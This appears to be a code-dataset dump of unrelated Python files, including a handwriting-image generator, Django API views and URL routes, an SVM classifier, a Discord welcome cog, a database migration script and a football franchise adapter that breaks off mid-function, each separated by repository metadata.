这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
"""
imagex = Image.open("./pic/stationeryBackground.jpg")
width, height = imagex.size
imagex = imagex.resize((width * 2, height * 2), resample=Image.LANCZOS)
template = Template(background=imagex,
font_size=140,
font=ImageFont.truetype("./fonts/whx_2nd.ttf"),
line_spacing=220,
fill=0, # 字体“颜色”
left_margin=380,
top_margin=370,
right_margin=340,
bottom_margin=340,
word_spacing=12,
line_spacing_sigma=7, # 行间距随机扰动
font_size_sigma=3, # 字体大小随机扰动
word_spacing_sigma=6, # 字间距随机扰动
end_chars=", 。", # 防止特定字符因排版算法的自动换行而出现在行首
perturb_x_sigma=2, # 笔画横向偏移随机扰动
perturb_y_sigma=2, # 笔画纵向偏移随机扰动
perturb_theta_sigma=0.05, # 笔画旋转偏移随机扰动
)
images = handwrite(text, template)
for i, im in enumerate(images):
assert isinstance(im, Image.Image)
im.show()
im.save("./output/{}.png".format(i)) | 43.547619 | 172 | 0.783488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,901 | 0.789818 |
1d117bf0adf1a9cc2baa3df6d95a6f65e94df2bb | 4,627 | py | Python | api/metadata/views.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | api/metadata/views.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | api/metadata/views.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | from django.conf import settings
from hawkrest import HawkAuthentication
from rest_framework import generics, status
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from .constants import (
BARRIER_PENDING,
BARRIER_SOURCE,
BarrierStatus,
BARRIER_CHANCE_OF_SUCCESS,
BARRIER_INTERACTION_TYPE,
BARRIER_TERMS,
ECONOMIC_ASSESSMENT_IMPACT,
ECONOMIC_ASSESSMENT_RATING,
ESTIMATED_LOSS_RANGE,
GOVT_RESPONSE,
PUBLISH_RESPONSE,
REPORT_STATUS,
RESOLVABILITY_ASSESSMENT_EFFORT,
RESOLVABILITY_ASSESSMENT_TIME,
STAGE_STATUS,
STRATEGIC_ASSESSMENT_SCALE,
SUPPORT_TYPE,
TRADE_CATEGORIES,
TRADE_DIRECTION_CHOICES,
TRADING_BLOCS,
)
from .utils import (
get_admin_areas,
get_barrier_priorities,
get_barrier_tags,
get_barrier_type_categories,
get_categories,
get_os_regions_and_countries,
get_reporting_stages,
get_sectors,
get_wto_committee_groups, get_government_organisations,
)
class MetadataView(generics.GenericAPIView):
if settings.HAWK_ENABLED:
authentication_classes = (HawkAuthentication,)
permission_classes = (IsAuthenticated,)
else:
authentication_classes = ()
permission_classes = ()
def get(self, request):
barrier_terms = dict(BARRIER_TERMS)
loss_range = dict(ESTIMATED_LOSS_RANGE)
stage_status = dict(STAGE_STATUS)
govt_response = dict(GOVT_RESPONSE)
publish_response = dict(PUBLISH_RESPONSE)
report_status = dict(REPORT_STATUS)
support_type = dict(SUPPORT_TYPE)
barrier_status = dict(BarrierStatus.choices)
barrier_pending = dict(BARRIER_PENDING)
barrier_chance = dict(BARRIER_CHANCE_OF_SUCCESS)
barrier_inter_type = dict(BARRIER_INTERACTION_TYPE)
barrier_source = dict(BARRIER_SOURCE)
trade_categories = dict(TRADE_CATEGORIES)
economic_assessment_impact = dict(ECONOMIC_ASSESSMENT_IMPACT)
economic_assessment_rating = dict(ECONOMIC_ASSESSMENT_RATING)
assessment_effort_to_resolve = dict(RESOLVABILITY_ASSESSMENT_EFFORT)
assessment_time_to_resolve = dict(RESOLVABILITY_ASSESSMENT_TIME)
strategic_assessment_scale = dict(STRATEGIC_ASSESSMENT_SCALE)
dh_os_regions, dh_countries = get_os_regions_and_countries()
dh_admin_areas = get_admin_areas()
dh_sectors = get_sectors()
report_stages = get_reporting_stages()
categories = get_categories()
barrier_type_cat = get_barrier_type_categories()
barrier_priorities = get_barrier_priorities()
barrier_tags = get_barrier_tags()
trade_direction = dict((str(x), y) for x, y in TRADE_DIRECTION_CHOICES)
wto_committee_groups = get_wto_committee_groups()
government_organisations = get_government_organisations()
results = {
"barrier_terms": barrier_terms,
"loss_range": loss_range,
"stage_status": stage_status,
"govt_response": govt_response,
"publish_response": publish_response,
"report_status": report_status,
"report_stages": report_stages,
"support_type": support_type,
"barrier_types": categories,
"categories": categories,
"overseas_regions": dh_os_regions,
"countries": dh_countries,
"admin_areas": dh_admin_areas,
"sectors": dh_sectors,
"barrier_status": barrier_status,
"barrier_pending": barrier_pending,
"barrier_tags": barrier_tags,
"barrier_type_categories": barrier_type_cat,
"barrier_chance_of_success": barrier_chance,
"barrier_interaction_types": barrier_inter_type,
"barrier_source": barrier_source,
"barrier_priorities": barrier_priorities,
"economic_assessment_impact": economic_assessment_impact,
"economic_assessment_rating": economic_assessment_rating,
"resolvability_assessment_effort": assessment_effort_to_resolve,
"resolvability_assessment_time": assessment_time_to_resolve,
"strategic_assessment_scale": strategic_assessment_scale,
"trade_categories": trade_categories,
"trade_direction": trade_direction,
"trading_blocs": TRADING_BLOCS.values(),
"wto_committee_groups": wto_committee_groups,
"government_organisations": government_organisations,
}
return Response(results, status=status.HTTP_200_OK)
| 37.92623 | 79 | 0.706938 | 3,593 | 0.776529 | 0 | 0 | 0 | 0 | 0 | 0 | 604 | 0.130538 |
1d14d1a8f4768aa5af1d7409da82dc30b96fd135 | 367 | py | Python | test_memory.py | dbstein/python_examples | 664142b5f8e5f58c04f1d588bc6659221dc6b0a9 | [
"Apache-2.0"
] | null | null | null | test_memory.py | dbstein/python_examples | 664142b5f8e5f58c04f1d588bc6659221dc6b0a9 | [
"Apache-2.0"
] | null | null | null | test_memory.py | dbstein/python_examples | 664142b5f8e5f58c04f1d588bc6659221dc6b0a9 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from numexpr_kernel import numexpr_kernel
from numba_kernel import numba_kernel
N = 10000
x = np.random.rand(N)
y = np.random.rand(N)
z = np.random.rand(N)
tau = np.random.rand(N)
r1 = numexpr_kernel(x, y, z, tau)
r1 = numexpr_kernel(x, y, z, tau)
r2 = np.zeros(N, dtype=float)
numba_kernel(x, y, z, tau, r2, N)
numba_kernel(x, y, z, tau, r2, N)
| 22.9375 | 41 | 0.700272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1d168df70c241bffc650db1634940f97996ff8f9 | 151 | py | Python | 8kyu/grasshopper_combine_strings.py | nhsz/codewars | 82703959e910254d6feff4162f78c6dbd7a1c3ed | [
"MIT"
] | 1 | 2018-12-02T23:04:38.000Z | 2018-12-02T23:04:38.000Z | 8kyu/grasshopper_combine_strings.py | nhsz/codewars | 82703959e910254d6feff4162f78c6dbd7a1c3ed | [
"MIT"
] | null | null | null | 8kyu/grasshopper_combine_strings.py | nhsz/codewars | 82703959e910254d6feff4162f78c6dbd7a1c3ed | [
"MIT"
] | null | null | null | # http://www.codewars.com/kata/55f73f66d160f1f1db000059/
def combine_names(first_name, last_name):
return "{0} {1}".format(first_name, last_name)
| 30.2 | 56 | 0.754967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.430464 |
1d17af49d97762d297a5faa5d4a099f944bdc291 | 1,125 | py | Python | PG/project/myapp/urls.py | vishalimpinge7696/vishal_pg | c881b8d6d784b764700d2068226cb725c16f9490 | [
"Apache-2.0"
] | null | null | null | PG/project/myapp/urls.py | vishalimpinge7696/vishal_pg | c881b8d6d784b764700d2068226cb725c16f9490 | [
"Apache-2.0"
] | null | null | null | PG/project/myapp/urls.py | vishalimpinge7696/vishal_pg | c881b8d6d784b764700d2068226cb725c16f9490 | [
"Apache-2.0"
] | null | null | null | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='home'),
path('signup',views.signup, name='signup'),
path('signin',views.signin, name='signin'),
path('logout',views.logout,name='logout'),
path('property', views.property, name='property'),
path('agents', views.agents, name='agents'),
path('news', views.news, name='news'),
path('pages', views.pages, name='pages'),
path('contact', views.contact, name='contact')
]
| 37.5 | 77 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 766 | 0.680889 |
1d1827406da3b2f551eb53c92ceb578ffb31e0ff | 3,425 | py | Python | full_test_data_svm_rbf.py | HarikrishnanNB/occd_experiments | e078030348133a564400a5b27057400c69ddfd92 | [
"Apache-2.0"
] | null | null | null | full_test_data_svm_rbf.py | HarikrishnanNB/occd_experiments | e078030348133a564400a5b27057400c69ddfd92 | [
"Apache-2.0"
] | null | null | null | full_test_data_svm_rbf.py | HarikrishnanNB/occd_experiments | e078030348133a564400a5b27057400c69ddfd92 | [
"Apache-2.0"
] | 1 | 2021-02-14T06:14:47.000Z | 2021-02-14T06:14:47.000Z | """
This module give the classification results for test data using SVM with RBF
kernel.
Email: harikrishnannb07@gmail.com
Dtd: 2 - August - 2020
Parameters
----------
classification_type : string
DESCRIPTION - classification_type == "binary_class" loads binary classification artificial data.
classification_type == "multi_class" loads multiclass artificial data
folder_name : string
DESCRIPTION - the name of the folder to store results. For eg., if
folder_name = "hnb", then this function will create two folder "hnb-svm"
and "hnb-svm_rbf" to save the classification report.
target_names : array, 1D, string
DESCRIPTION - if there are two classes, then target_names = ['class-0', class-1]
Note- At the present version of the code, the results for binary classification
and five class classification will be saved.
Returns : None
-------
Computes the accuracy_svm_rbf, fscore_svm_rbf
"""
import os
import numpy as np
from sklearn.metrics import f1_score, accuracy_score
from sklearn import svm
from sklearn.metrics import confusion_matrix as cm
from sklearn.metrics import classification_report
from load_data_synthetic import get_data
#from Codes import classification_report_csv_
classification_type = "concentric_circle_noise"
folder_name = "full-testdata"
target_names = ['class-0', 'class-1']
path = os.getcwd()
result_path_svm_rbf = path + '/NEUROCHAOS-RESULTS/' + classification_type + '/' + folder_name +'-svm_rbf/'
# Creating Folder to save the results
try:
os.makedirs(result_path_svm_rbf)
except OSError:
print("Creation of the result directory %s failed" % result_path_svm_rbf)
else:
print("Successfully created the result directory %s" % result_path_svm_rbf)
full_artificial_data, full_artificial_label, full_artificial_test_data, full_artificial_test_label = get_data(classification_type)
num_classes = len(np.unique(full_artificial_label)) # Number of classes
print("**** Genome data details ******")
for class_label in range(np.max(full_artificial_label)+1):
print("Total Data instance in Class -", class_label, " = ", full_artificial_label.tolist().count([class_label]))
print(" train data = ", (full_artificial_data.shape[0]))
print("val data = ", (full_artificial_test_data.shape[0]))
# Start of svm_rbf classifier
svm_rbf_classifier = svm.SVC(kernel='rbf', gamma='scale')
svm_rbf_classifier.fit(full_artificial_data, full_artificial_label[:, 0])
predicted_svm_rbf_val_label = svm_rbf_classifier.predict(full_artificial_test_data)
acc_svm_rbf = accuracy_score(full_artificial_test_label, predicted_svm_rbf_val_label)*100
f1score_svm_rbf = f1_score(full_artificial_test_label, predicted_svm_rbf_val_label, average="macro")
report_svm_rbf = classification_report(full_artificial_test_label, predicted_svm_rbf_val_label, target_names=target_names)
# Saving the classification report to csv file for svm_rbf classifier.
print(report_svm_rbf)
#classification_report_csv_(report_svm_rbf, num_classes).to_csv(result_path_svm_rbf+'svm_rbf_report_'+ str(iterations) +'.csv', index=False)
confusion_matrix_svm_rbf = cm(full_artificial_test_label, predicted_svm_rbf_val_label)
print("Confusion matrixfor svm_rbf\n", confusion_matrix_svm_rbf)
# End of svm_rbf classifier.
# saving the f1-score
np.save(result_path_svm_rbf + 'f1score.npy', f1score_svm_rbf)
| 40.77381 | 141 | 0.771095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,692 | 0.494015 |
1d190a8611651be6c78a5e9a052e5a0ee7efbe5c | 2,115 | py | Python | sci_analysis/preferences/preferences.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | [
"MIT"
] | 17 | 2017-05-10T18:25:36.000Z | 2021-12-23T14:43:49.000Z | sci_analysis/preferences/preferences.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | [
"MIT"
] | 57 | 2016-08-22T23:58:05.000Z | 2019-07-31T06:54:22.000Z | sci_analysis/preferences/preferences.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | [
"MIT"
] | null | null | null |
class DefaultPreferences(type):
"""The type for Default Preferences that cannot be modified"""
def __setattr__(cls, key, value):
if key == "defaults":
raise AttributeError("Cannot override defaults")
else:
return type.__setattr__(cls, key, value)
def __delattr__(cls, item):
if item == "defaults":
raise AttributeError("Cannot delete defaults")
else:
return type.__delattr__(cls, item)
class Preferences(object):
"""The base Preferences class"""
__metaclass__ = DefaultPreferences
def list(self):
print(self.__dict__)
return self.__dict__
def defaults(self):
return tuple(self.__dict__.values())
class GraphPreferences(object):
"""Handles graphing preferences."""
class Plot(object):
boxplot = True
histogram = True
cdf = False
oneway = True
probplot = True
scatter = True
tukey = False
histogram_borders = False
boxplot_borders = False
defaults = (boxplot, histogram, cdf, oneway, probplot, scatter, tukey, histogram_borders, boxplot_borders)
distribution = {'counts': False,
'violin': False,
'boxplot': True,
'fit': False,
'fit_style': 'r--',
'fit_width': '2',
'cdf_style': 'k-',
'distribution': 'norm',
'bins': 20,
'color': 'green'
}
bivariate = {'points': True,
'point_style': 'k.',
'contours': False,
'contour_width': 1.25,
'fit': True,
'fit_style': 'r-',
'fit_width': 1,
'boxplot': True,
'violin': True,
'bins': 20,
'color': 'green'
}
oneway = {'boxplot': True,
'violin': False,
'point_style': '^',
'line_style': '-'
}
| 27.467532 | 114 | 0.48227 | 2,106 | 0.995745 | 0 | 0 | 0 | 0 | 0 | 0 | 480 | 0.22695 |
1d1ad6315c73b6924e164f03e7e42156df8826eb | 1,224 | py | Python | cogs/WelcomeCog.py | tandemdude/DevilDonkey | be2c561f73c42aa2d5016e186bef2538658475d5 | [
"MIT"
] | 1 | 2021-08-22T17:34:41.000Z | 2021-08-22T17:34:41.000Z | cogs/WelcomeCog.py | tandemdude/DevilDonkey | be2c561f73c42aa2d5016e186bef2538658475d5 | [
"MIT"
] | null | null | null | cogs/WelcomeCog.py | tandemdude/DevilDonkey | be2c561f73c42aa2d5016e186bef2538658475d5 | [
"MIT"
] | null | null | null | # User welcome extension coded by github u/tandemdude
# https://github.com/tandemdude
import discord
import json
from discord.ext import commands
class Welcome(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_member_join(self, member):
with open('config.json') as json_file:
config = json.load(json_file)
welcome_channel_id = config['welcome_ch']
if welcome_channel_id != 0:
a = discord.Embed(title='Welcome!', color=0xde2bea)
a.set_author(name=f'{member.display_name} Has joined the server!', icon_url=member.avatar_url)
welcome_channel = self.bot.get_channel(welcome_channel_id)
await welcome_channel.send(embed=a)
@commands.Cog.listener()
async def on_member_remove(self, member):
with open('config.json') as json_file:
config = json.load(json_file)
welcome_channel_id = config['welcome_ch']
if welcome_channel_id != 0:
a = discord.Embed(title='See you again soon!', color=0xde2bea)
a.set_author(name=f'{member.display_name} Has left the server 😢', icon_url=member.avatar_url)
welcome_channel = self.bot.get_channel(welcome_channel_id)
await welcome_channel.send(embed=a)
def setup(bot):
bot.add_cog(Welcome(bot))
| 29.142857 | 97 | 0.747549 | 1,033 | 0.841891 | 0 | 0 | 955 | 0.778321 | 903 | 0.735941 | 261 | 0.212714 |
1d1b331ff1ab098a4c5dbc7bd53b72d465dadc1d | 293 | py | Python | configurations.py | KumundzhievMaxim/WearingGlassesClassification | ae78a258735e852a1fbb9d9d9876f9ea74320153 | [
"MIT"
] | 1 | 2021-06-05T13:10:07.000Z | 2021-06-05T13:10:07.000Z | configurations.py | KumundzhievMaxim/WearingGlassesClassification | ae78a258735e852a1fbb9d9d9876f9ea74320153 | [
"MIT"
] | null | null | null | configurations.py | KumundzhievMaxim/WearingGlassesClassification | ae78a258735e852a1fbb9d9d9876f9ea74320153 | [
"MIT"
] | null | null | null | # ------------------------------------------
#
# Program created by Maksim Kumundzhiev
#
#
# email: kumundzhievmaxim@gmail.com
# github: https://github.com/KumundzhievMaxim
# -------------------------------------------
BATCH_SIZE = 10
IMG_SIZE = (160, 160)
MODEL_PATH = 'checkpoints/model'
| 20.928571 | 45 | 0.511945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.788396 |
1d1cbe4a45b8515cd47580925c5d9d6956f0f60a | 10,247 | py | Python | conditional/models/migrate.py | adamhb123/conditional | 7193443106f83e8260b61535b6d6a253f01133f8 | [
"MIT"
] | 2 | 2020-06-27T09:11:59.000Z | 2020-12-27T17:49:50.000Z | conditional/models/migrate.py | adamhb123/conditional | 7193443106f83e8260b61535b6d6a253f01133f8 | [
"MIT"
] | null | null | null | conditional/models/migrate.py | adamhb123/conditional | 7193443106f83e8260b61535b6d6a253f01133f8 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from conditional import db
from conditional.models import models, old_models as zoo
import flask_migrate
# pylint: skip-file
old_engine = None
zoo_session = None
# Takes in param of SqlAlchemy Database Connection String
def free_the_zoo(zoo_url):
confirm = str(input('Are you sure you want to clear and re-migrate the database? (y/N): ')).strip()
if confirm == 'y':
init_zoo_db(zoo_url)
if flask_migrate.current() is not None:
flask_migrate.downgrade(tag='base')
flask_migrate.upgrade()
migrate_models()
# Connect to Zookeeper
def init_zoo_db(database_url):
global old_engine, zoo_session
old_engine = create_engine(database_url, convert_unicode=True)
zoo_session = scoped_session(sessionmaker(autocommit=False,
autoflush=False,
bind=old_engine))
zoo.Base.metadata.create_all(bind=old_engine)
def id_to_committee(comm_id):
committees = [
'Evaluations',
'Financial',
'History',
'House Improvements',
'Opcomm',
'R&D',
'Social',
'Social',
'Chairman'
]
return committees[comm_id]
def get_fid(name):
from conditional.models.models import FreshmanAccount
print(name)
return FreshmanAccount.query.filter(FreshmanAccount.name == name).first().id
# Begin the Great Migration!
def migrate_models():
print("BEGIN: freshman evals")
# ==========
tech_sems = {}
freshman_evals = [
{
'username': f.username,
'evalDate': f.voteDate,
'projectStatus': f.freshProjPass,
'signaturesMissed': f.numMissedSigs,
'socialEvents': f.socEvents,
'techSems': f.techSems,
'comments': f.comments,
'result': f.result
} for f in zoo_session.query(zoo.FreshmanEval).all()]
for f in freshman_evals:
if not f['username'].startswith('f_'):
# freshman who have completed packet and have a CSH account
eval_data = models.FreshmanEvalData(f['username'], f['signaturesMissed'])
# FIXME: Zookeeper was only pass/fail for freshman project not pending
if f['projectStatus'] == 1:
eval_data.freshman_project = 'Passed'
eval_data.social_events = f['socialEvents']
eval_data.other_notes = f['comments']
eval_data.eval_date = f['evalDate']
# TODO: conditional
if f['result'] == "pass":
eval_data.freshman_eval_result = "Passed"
elif f['result'] == "fail":
eval_data.freshman_eval_result = "Failed"
else:
eval_data.freshman_eval_result = "Pending"
if f['techSems'] is not None:
t_sems = f['techSems'].split(',')
for sem in t_sems:
if sem not in tech_sems:
tech_sems[sem] = [f['username']]
else:
tech_sems[sem].append(f['username'])
db.session.add(eval_data)
else:
# freshman not yet done with packet
# TODO FIXME The FALSE dictates that they are not given onfloor
# status
account = models.FreshmanAccount(f['username'], False)
account.eval_date = f['evalDate']
if f['techSems'] is not None:
t_sems = f['techSems'].split(',')
for sem in t_sems:
if sem not in tech_sems:
tech_sems[sem] = [f['username']]
else:
tech_sems[sem].append(f['username'])
db.session.add(account)
print("tech sems")
tech_sems.pop('', None)
print(tech_sems)
for t_sem in tech_sems:
# TODO FIXME: Is there a timestamp we can migrate for seminars?
from datetime import datetime
sem = models.TechnicalSeminar(t_sem, datetime.now())
db.session.add(sem)
db.session.flush()
db.session.refresh(sem)
print(sem.__dict__)
for m in tech_sems[t_sem]:
if m.startswith("f_"):
print(sem.id)
a = models.FreshmanSeminarAttendance(get_fid(m), sem.id)
db.session.add(a)
else:
a = models.MemberSeminarAttendance(m, sem.id)
db.session.add(a)
db.session.flush()
print("END: freshman evals")
# ==========
print("BEGIN: migrate committee meeting attendance")
# ==========
c_meetings = [
(
m.meeting_date,
m.committee_id
) for m in zoo_session.query(zoo.Attendance).all()]
c_meetings = list(set(c_meetings))
c_meetings = list(filter(lambda x: x[0] is not None, c_meetings))
c_meetings.sort(key=lambda col: col[0])
com_meetings = []
for cm in c_meetings:
m = models.CommitteeMeeting(id_to_committee(cm[1]), cm[0])
if cm[0] is None:
# fuck man
continue
db.session.add(m)
db.session.flush()
db.session.refresh(m)
com_meetings.append(cm)
c_meetings = [
(
m.username,
(
m.meeting_date,
m.committee_id
)
) for m in zoo_session.query(zoo.Attendance).all()]
for cm in c_meetings:
if cm[1][0] is None:
# fuck man
continue
if cm[1][1] == 8:
continue
if cm[0].startswith('f_'):
f = models.FreshmanCommitteeAttendance(
get_fid(cm[0]),
com_meetings.index(cm[1])
)
db.session.add(f)
else:
m = models.MemberCommitteeAttendance(cm[0], com_meetings.index(cm[1]) + 1)
db.session.add(m)
db.session.flush()
print("END: migrate committee meeting attendance")
# ==========
print("BEGIN: migrate conditionals")
# ==========
condits = [
{
"uid": c.username,
"desc": c.description,
"deadline": c.deadline,
"status": c.status
} for c in zoo_session.query(zoo.Conditional).all()]
for c in condits:
condit = models.Conditional(c['uid'], c['desc'], c['deadline'])
db.session.add(condit)
print("END: migrate conditionals")
# ==========
print("BEGIN: house meetings")
h_meetings = [hm.date for hm in zoo_session.query(zoo.HouseMeeting).all()]
h_meetings = list(set(h_meetings))
h_meetings.sort()
print(h_meetings)
house_meetings = {}
for hm in h_meetings:
m = models.HouseMeeting(hm)
db.session.add(m)
db.session.flush()
db.session.refresh(m)
house_meetings[hm.strftime("%Y-%m-%d")] = m.id
print(house_meetings)
hma = [
{
'uid': hm.username,
'date': hm.date,
'present': hm.present,
'excused': hm.excused,
'comments': hm.comments
} for hm in zoo_session.query(zoo.HouseMeeting).all()]
for a in hma:
meeting_id = house_meetings[a['date'].strftime("%Y-%m-%d")]
if a['present'] == 1:
status = "Attended"
elif a['excused'] == 1:
status = "Excused"
else:
status = "Absent"
excuse = a['comments']
if a['uid'].startswith("f_"):
# freshman
fhma = models.FreshmanHouseMeetingAttendance(
get_fid(a['uid']),
meeting_id,
excuse,
status)
db.session.add(fhma)
else:
# member
mhma = models.MemberHouseMeetingAttendance(
a['uid'],
meeting_id,
excuse,
status)
db.session.add(mhma)
print("END: house meetings")
# ==========
print("BEGIN: Major Projects")
projects = [
{
'username': mp.username,
'name': mp.project_name,
'description': mp.project_description,
'status': mp.status
} for mp in zoo_session.query(zoo.MajorProject).all()]
for p in projects:
mp = models.MajorProject(
p['username'],
p['name'],
p['description']
)
if p['status'] == 'pass':
mp.status = 'Passed'
if p['status'] == 'fail':
mp.status = 'Failed'
db.session.add(mp)
print("END: Major Projects")
# ==========
print("BEGIN: ON FLOOR")
import conditional.util.ldap as ldap
from datetime import datetime
members = [m['uid'][0].decode('utf-8') for m in ldap.ldap_get_onfloor_members()]
for m in members:
db.session.add(models.OnFloorStatusAssigned(m, datetime.now()))
print("END: ON FLOOR")
print("BEGIN: SPRING EVALS")
members = [m['uid'][0].decode('utf-8') for m in ldap.ldap_get_active_members()]
for m in members:
db.session.add(models.SpringEval(m))
print("END: SPRING EVALS")
print("BEGIN: Housing Evals")
hevals = [
{
'username': he.username,
'social_attended': he.social_attended,
'social_hosted': he.social_hosted,
'seminars_attended': he.seminars_attended,
'seminars_hosted': he.seminars_hosted,
'projects': he.projects,
'comments': he.comments
} for he in zoo_session.query(zoo.WinterEval).all()]
for he in hevals:
db.session.add(
models.HousingEvalsSubmission(
he['username'],
he['social_attended'],
he['social_hosted'],
he['seminars_attended'],
he['seminars_hosted'],
he['projects'],
he['comments']))
print("END: Housing Evals")
# Default EvalDB Settings
db.session.add(models.EvalSettings())
db.session.flush()
db.session.commit()
| 29.530259 | 103 | 0.539865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,055 | 0.200547 |
1d1e074b61872504f96ce32330f37d8ab5634c26 | 789 | py | Python | ch04/cross_entropy_error.py | sankaku/deep-learning-from-scratch-py | 70ec531578f099136744d2c1ec11959b239c3854 | [
"MIT"
] | null | null | null | ch04/cross_entropy_error.py | sankaku/deep-learning-from-scratch-py | 70ec531578f099136744d2c1ec11959b239c3854 | [
"MIT"
] | null | null | null | ch04/cross_entropy_error.py | sankaku/deep-learning-from-scratch-py | 70ec531578f099136744d2c1ec11959b239c3854 | [
"MIT"
] | null | null | null | import numpy as np
def cross_entropy_error(y, t):
delta = 1e-7 # to avoid log(0)
return - np.sum(t * np.log(y + delta))
if __name__ == '__main__':
t = np.array([0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
y1 = np.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
y2 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
y3 = np.array([0.1, 0.9, 0.3, 0.3, 0, 0, 0.2, 0, 0, 0.6])
print('t = {0}'.format(t))
print('y1 = {0}, cross_entropy_error = {1}'.format(
y1, cross_entropy_error(y1, t)))
print('y2 = {0}, cross_entropy_error = {1}'.format(
y2, cross_entropy_error(y2, t)))
print('y3 = {0}, cross_entropy_error = {1}'.format(
y3, cross_entropy_error(y3, t)))
print('t = {0}, cross_entropy_error = {1}'.format(
t, cross_entropy_error(t, t)))
| 31.56 | 61 | 0.536122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 183 | 0.231939 |
1d1e45fe56dabcf2ddf962ee15b1e9639fc43965 | 466 | py | Python | day-02/part-2/david.py | badouralix/adventofcode-2018 | 543ce39d4eeb7d9d695459ffadca001a8c56386d | [
"MIT"
] | 31 | 2018-12-01T00:43:40.000Z | 2020-05-30T05:18:59.000Z | day-02/part-2/david.py | badouralix/adventofcode-2018 | 543ce39d4eeb7d9d695459ffadca001a8c56386d | [
"MIT"
] | 14 | 2018-12-01T12:14:26.000Z | 2021-05-07T22:41:47.000Z | day-02/part-2/david.py | badouralix/adventofcode-2018 | 543ce39d4eeb7d9d695459ffadca001a8c56386d | [
"MIT"
] | 10 | 2018-12-01T23:38:34.000Z | 2020-12-28T13:36:10.000Z | from tool.runners.python import SubmissionPy
class DavidSubmission(SubmissionPy):
def bucket_key(self, w, i):
return w[:i] + w[i+1:]
def run(self, s):
words = s.split("\n")
n = len(words[0])
buckets = [set() for i in range(n)]
for w in words:
for i in range(n):
k = self.bucket_key(w, i)
if k in buckets[i]:
return k
buckets[i].add(k)
| 25.888889 | 44 | 0.48927 | 418 | 0.896996 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0.008584 |
1d20d0efe9e2afc5c843ccc72c38d5f99d5237b5 | 3,653 | py | Python | Plug-ins/PlexSportsAgent.bundle/Contents/Code/Teams/NFL/ProFootballReferenceFranchiseAdapter.py | waldosax/PlexSports | 404058921e4be02b93ad155bdaef768ff917620e | [
"MIT"
] | 5 | 2021-07-09T01:05:47.000Z | 2021-09-06T02:23:12.000Z | Plug-ins/PlexSportsAgent.bundle/Contents/Code/Teams/NFL/ProFootballReferenceFranchiseAdapter.py | waldosax/PlexSports | 404058921e4be02b93ad155bdaef768ff917620e | [
"MIT"
] | 1 | 2022-01-08T04:04:56.000Z | 2022-01-08T04:04:56.000Z | Plug-ins/PlexSportsAgent.bundle/Contents/Code/Teams/NFL/ProFootballReferenceFranchiseAdapter.py | waldosax/PlexSports | 404058921e4be02b93ad155bdaef768ff917620e | [
"MIT"
] | null | null | null | # Pro-Football-Reference.com
# TEAMS
import re, os
import uuid
import json
from datetime import datetime, date, time
from bs4 import BeautifulSoup
import bs4
from Constants import *
from PathUtils import *
from PluginSupport import *
from Serialization import *
from StringUtils import *
import ProFootballReferenceFranchiseScraper as FranschiseScraper
pfr_cached_franchises = dict()
pfr_abbreviation_corrections = {
"CRD": "ARI",
"RAV": "BAL",
"BBA": "BUF",
"GNB": "GB",
"HTX": "HOU",
"CLT": "IND",
"KAN": "KC",
"RAI": "LV",
"SDG": "LAC",
"RAM": "LAR",
"NWE": "NE",
"NOR": "NO",
"SFO": "SF",
"TAM": "TB",
"OTI": "TEN"
}
def DownloadAllFranchises(league):
pfrFranchises = dict(FranschiseScraper.GetFranchises())
# Adapt franchises to global teams model
